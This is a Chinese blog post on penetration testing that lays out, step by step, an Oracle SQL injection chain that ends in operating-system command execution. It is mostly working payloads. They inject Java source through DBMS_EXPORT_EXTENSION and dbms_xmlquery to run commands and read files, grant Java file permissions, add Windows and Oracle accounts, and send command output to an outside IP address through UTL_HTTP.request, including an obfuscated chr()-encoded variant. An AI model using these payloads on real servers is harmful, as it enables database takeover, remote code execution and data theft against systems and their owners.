犀利的 oracle 注入技术

最新推荐文章于 2024-05-14 08:53:38 发布
最新推荐文章于 2024-05-14 08:53:38 发布
阅读量1k 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhalang8324/article/details/78645077
版权

原来一直不知道oracle注入可以你拿shell,特意记录下

 

以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 
  的形式即可。(用" 'a'|| "是为了让语句返回true值) 
  语句有点长,可能要用post提交。 
  以下是各个步骤: 
  1.创建包 
  通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
  /xxx.jsp?id=1 and '1'<>'a'||( 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
  new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  }'''';END;'';END;--','SYS',0,'1',0) from dual 
  ) 
  ------------------------ 
  如果url有长度限制,可以把readFile()函数块去掉,即: 
  /xxx.jsp?id=1 and '1'<>'a'||( 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
  new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  }'''';END;'';END;--','SYS',0,'1',0) from dual 
  ) 
  同时把后面步骤 提到的 对readFile()的处理语句去掉。 
  ------------------------------ 
  2.赋Java权限 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
  3.创建函数 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
  4.赋public执行函数的权限 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
  5.测试上面的几步是否成功 
  and '1'<>'11'||( 
  select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 
  ) 
  and '1'<>( 
  select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 
  ) 
  6.执行命令: 
  /xxx.jsp?id=1 and '1'<>( 
  select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 
  ) 
  /xxx.jsp?id=1 and '1'<>( 
  select  sys.LinxReadFile('c:/boot.ini') from dual

)
  
  注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 
  如果要查看运行结果可以用 union : 
  /xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
  或者UTL_HTTP.request(: 
  /xxx.jsp?id=1 and '1'<>( 
  SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
  ) 
  /xxx.jsp?id=1 and '1'<>( 
  SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
  ) 
  注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
  -------------------- 
  6.内部变化 
  通过以下命令可以查看all_objects表达改变: 
  select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
  7.删除我们创建的函数 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 
  ==================================================== 
  全文结束。谨以此文赠与我的朋友。 
  linx 
  124829445 
  2008.1.12 
  linyujian@bjfu.edu.cn 
  ====================================================================== 
  测试漏洞的另一方法: 
  创建oracle帐号: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
  即: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
  chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 
  确定漏洞存在: 
  1<>( 
  select user_id from all_users where username='LINXSQL' 
  ) 
  给linxsql连接权限: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 
  删除帐号: 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 
  ====================== 
  以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
  1.jsp?id=1 and '1'<>( 
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
 
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE

 )

 

 

更新一版dba权限下getshell的:

开始创建JAVA Source,执行:

UNION ALL SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--

查看是否创建成功的命令:

select OWNER,OBJECT_NAME,OBJECT_TYPE from all_objects where object_name like '%LINX%' or object_name like '%Linx%'

接下来是Java赋执行权限,但是此之前我们需要先给用户添加java运行权限,因此先执行:

NION ALL SELECT  dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate '' grant JAVASYSPRIV to SYSTEM ''commit;end;'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--

再执行:

UNION ALL SELECT  dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--

最后创建执行函数,执行LINXRUNCMD:

UNION ALL SELECT  dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--

验证函数是否创建成功:

select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'

最后调用函数执行命令:

select LinxRunCMD('whoami') from dual

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

逝之君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle注入技术手册(Hacking_Oracle_From_Web)
10-12
该文档介绍了oracle显错、不显错情况下的注入,并介绍通过注入执行系统命令,同时介绍多种提权的0day 注意是英文版的
一次与sql注入 & webshell 的美丽“邂逅”
weixin_34218890的博客
04-27 157
引言 一波未平,一波又起。金融公司的业务实在是太引人耳目,何况我们公司的业处正处于风口之上(区块链金融),并且每天有大量现金交易,所以不知道有多少黑客躲在暗处一直在盯着你的系统,让你防不胜防,并且想方设法的找到突破点,以达到黑客的目的来获取非法利益。俗话说:“道高一尺,魔高一丈”。系统和代码也可以这么理解,防的在好,总有漏洞。系统和代码也没有绝对的安全。该来的总会来......sql注入与“她”相...
2024年Go最新干货 Oracle注入和漏洞利用姿势总结,统统都会
最新发布
qq_38197819的博客
05-14 441
Oracle 8i 开始,Oracle Database 允许在数据库中存储和执行 Java,并提供了 Java 池,用于存放 Java 代码、Java 语句的语法分析表、Java 语句的执行方案和 Java 虚拟机中的数据,以便进行 Java 程序开发。在实际利用中,如果我们获取了 Oracle 管理员级别的用户凭据,可以通过 DBMS_SCHEDULER 包中存储过程创建程序/作业对象,来调度操作系统的可执行文件或脚本,从而执行系统命令。此外,还需要数据库服务器可以出网。
Oracle也有注入漏洞
09-11
Oracle也有注入漏洞
oracle进行getshell
m0_55772907的博客
11-21 2431
getshell
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 5159
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
Oracle 注入bypass总结(艰难的心路历程)
weixin_42508548的博客
11-24 1735
文前先感谢大家的支持,上篇Oracle数据库注入总结想着后续学习一下如何进行利用,getshell的,奈何技术还太菜了,再加上项目压力大,所以就慢慢搁置了。这里先出一篇bypass的,文中仅针对Oracle数据库,但是bypass手法我认为万变不离其宗,思想上是通用的,希望能够对大家有所帮助。 0x01 环境准备 一、安装Oracle数据库 1、首先下载数据库安装软件 具体可以从参考这里,我是从他的百度云下载的Windows10下安装Oracle 11g_勿忘初心的博客-CSDN博客_win10安装o
oracle getshell,中国联通珠海某站SQL注入已getshell | wooyun-2015-0158792| WooYun.org
weixin_30120421的博客
04-16 652
[emailprotected]:~$ sudo sqlmap -u "**.**.**.**:8080/ctop/portal/portal_info.jsp?id=1" --os-shellsudo:/etc/sudoers.d/fruitywifi 属于用户 ID 1000,应为 0____ ___| |_____ ___ ___ {1.0-dev-nongit-20150922}|_ ...
CRM平台Oracle技术服务
06-30
CRM平台Oracle技术服务
oracle注入绕狗1
08-03
oracle注入绕狗1
ORACLE数据库技术实用详解
07-23
资源名称:ORACLE数据库技术实用详解资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
Oracle索引技术
07-23
资源名称:Oracle索引技术内容简介:正确使用Oracle数据库的索引不仅可以实现良好的性能,更重要的是能够创造出可伸缩的数据库应用程序。本书在介绍各种类型索引的过程中,始终围绕性能这一主线,透彻分析了为Oracle...
sqlmap oracleshell,使用sqlmapGetshell
weixin_34837898的博客
04-06 3003
sqlmap读取与写入文件–file-read :从后端的数据库管理系统文件系统读取文件–file-write:编辑后端的数据库管理系统文件系统上的本地文件(从本地写入)–file-dest :后端的数据库管理系统写入文件的绝对路径 (写入目标路径)可以用以上几个命令对SQL注入后的系统文件进行读写,但是前提条件是需要有可读可写的权限并且为dba权限,否则无法成功进行读写操作。以DVWA为例,在k...
Oracle注入
weixin_48141183的博客
11-03 6780
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 近日学习了Oracle注入,写这篇文章主要当作自己的笔记,也希望能成为大家的参考。 一、Oracle的获取数据的基本技巧 1.特殊表 • dual表 ◆ 是一个虚拟的表,用来构成select的语法规则,oracle保证dual里面永远只有一条记录。 • user_tables表 ◆ 该表的ta.
干货 | Oracle注入和漏洞利用姿势总结
Javachichi的博客
01-17 2036
Oracle Database,又名 Oracle RDBMS,或简称 Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说 Oracle 数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2141
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
Oracle数据库注入
weixin_50464560的博客
08-06 1511
0x01 前言 在渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...
Oracle注入(基础篇)
zkaqlaoniao的博客
11-03 755
上面我们已经知道了是4个字段,然后就可以先写上4个null进行占位union select null,null,null,null from dual,然后逐个替换数据的类型进行测试,常见的数据类型其实就那么几个(数值,字符串,时间)在Oracle中有一个比较特殊的存在,它就是rownum,它是一个伪列,它并不存储在任何表中,而是在当我们执行了查询语句之后,它就会出现,对查出来的数据进行编号,将它做为一个判断规则时,它是不支持用>号的,只能是=1或者
PostgreSQL PG&Oracle-备份技术完美攻略
05-29
PostgreSQL PG&Oracle-备份技术完美攻略

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值